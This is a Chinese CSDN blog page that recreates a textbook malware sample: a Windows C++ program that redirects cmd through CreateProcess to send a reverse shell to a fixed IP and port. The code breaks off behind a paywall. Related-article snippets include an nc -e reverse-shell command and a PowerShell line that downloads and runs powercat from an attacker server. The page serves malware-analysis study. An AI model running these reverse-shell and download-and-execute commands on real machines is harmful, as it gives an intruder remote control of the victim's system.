CreateProcess 重定向CMD实现反弹shell

最新推荐文章于 2024-06-17 13:19:21 发布
最新推荐文章于 2024-06-17 13:19:21 发布
阅读量440 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kwansy/article/details/114274598
版权
该博客介绍了一种利用CreateProcess函数实现CMD反弹shell的方法,通过不断尝试连接指定的IP地址和端口,允许远程控制。C2服务器可以使用nc工具来接收这个反弹的shell。
摘要由CSDN通过智能技术生成

这段代码比我还老了,哈哈~

功能很简单,就是一直尝试向某个ip:port反弹shell,C2用nc就能接收这个反弹shell。

// RedirectCmd.cpp : Defines the entry point for the console application.
// 还原《恶意代码分析实战》第九章练习样本2

#include "stdafx.h"
#include <WinSock2.h>
#include <Windows.h>

#pragma comment(lib,"ws2_32")

#define DELAYMILLSECOND 3000
#define REMOTE_PORT 9999
#define REMOTE_IP "localhost"
#define CMD_STR "cmd"

int _tmain(int argc, _TCHAR* argv[])
{
   
	while (1)
	{
   
		WSAData WsaData;
		if (0 != WSAStartup
最低0.47元/天 解锁文章
hambaga
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
反弹cmd
qq_41861225的博客
01-21 1194
**前言:**我们在学习的过程中经常会听见“反弹shell”一词,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。同理我们也可以自己实现一套反弹cmd的操作。 ...
cmd反弹shell提权
10-24
cmd反弹shell提权
windows反弹shell的方法
最新发布
极客云曦前端
06-17 333
在这个例子中,攻击者的IP地址是192.168.1.17,端口是7777。首先说,正向shell是控制端主动连接被控制端,通过目标主机开放一个监听端口等待其他主机访问,从而获得对目标主机的shell访问,优点是控制端可以整个控制目标主机,但缺点会受到防火墙的连,等网络安全的限制。反向shell则是目标机器主动连接到攻击者的机器,通过在目标机器上执行操作访问攻击者的电脑建立的shell。简而言之,正向shell是攻击者主动出击,而反向shell则是目标机器主动反击,两者在网络环境的要求和安全性上有所不同。
反弹cmd命令
12-06
反弹cmd命令
反弹shell
stonesharp的专栏
04-03 3379
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2050
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
在Windows下实现shell模拟器
05-13
4. **输入/输出重定向**:shell模拟器可以支持标准输入、输出和错误流的重定向。例如,使用`CreateFile()`和`SetHandleInformation()`可以设置管道或文件作为进程的标准输入/输出。 5. **环境变量处理**:shell...
python怎么调用cmd_Python中执行cmd的方式
weixin_28419039的博客
01-11 6031
目前我使用到的Python中执行cmd的方式有三种:1. 使用os.system("cmd")这是最简单的一种方法,特点是执行的时候程序会打出cmd在Linux上执行的信息。使用前需要import os。[python]os.system("ls")2. 使用Popen模块产生新的process现在大部分人都喜欢使用Popen。Popen方法不会打印出cmd在linux上执行的信息。的确,Pope...
vb6控制台 重定向
09-01
实现控制台重定向,我们可以使用Shell函数或CreateProcess函数来启动一个命令行程序,并在命令行参数中使用">"符号来指定重定向的目标。例如,可以使用以下代码将程序的输出重定向到文件中: ``` Shell "cmd.exe ...
powershell反弹cmd
qq_42307546的博客
03-30 2698
下载地址 https://github.com/besimorhino/powercat 这个powercat可以放在服务器上供目标机器远程下载执行 首先在当前目录用python开启一个http服务 python3 -m http.server 8080 在kali上开启监听666端口 nc -lvvp 666 在webshell上执行命令 powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://192.1
JSP脚本反弹程序
10-20
实现shell反弹到指定地址,进行交互式SHELL管理!
VC++ 创建进程并等待其退出
flyfish
10-21 2962
VC 创建进程并等待其退出flyfish CString s = L"C:\\test.exe"; STARTUPINFO si; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.wShowWindow = SW_HIDE; PROCESS_INFORMATION pi; ZeroMemory(
CreateProcess执行cmd指令
08-30 3587
char szCmd[MAX_PATH] = {0}; memset(szCmd,0x00,sizeof(szCmd)); sprintf(szCmd,"tesseract.exe %s c:\\ocx\\ocr -l %s",ImagePath,m_strOcrLanguage.c_str()); STARTUPINFO si = { sizeof(si) }; ...
Windows下反弹shell的方式
ws1813004226的博客
05-25 6413
一、Windows下反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
网络安全-木马入侵windows -msfvenom反弹shellCMD
weixin_48137911的博客
02-19 5877
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
使用CreateProcess执行命令行
fengkuangfj的专栏
06-13 5954
BOOL ExecuteCommand( IN LPTSTR lpCommand ) { BOOL bRet = FALSE; UINT uResult = 0; TCHAR CommandLine[MAX_PATH] = {0}; STARTUPINFO StartupInfo = {0}; PROCESS_INFORMATION P
C++使用CreateProcess执行cmd命令(实例演示)
热门推荐
wtguo1022的博客
07-02 1万+
使用CreateProcess可以执行cmd命令,也可以执行一些可执行程序。//摘自msdn的示例代码 #include &lt;windows.h&gt; #include &lt;stdio.h&gt; #include &lt;tchar.h&gt; void _tmain( int argc, TCHAR *argv[] ) { STARTUPINFO si; PROCES...
createprocess执行cmd命令
06-06
在Windows系统中,cmd命令可以通过CreateProcess函数在命令行窗口中执行。 CreateProcess函数需要几个参数,这些参数包括指定新进程的文件名、命令行参数、进程安全性和环境变量等等。此外,可以指定该进程的初始...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值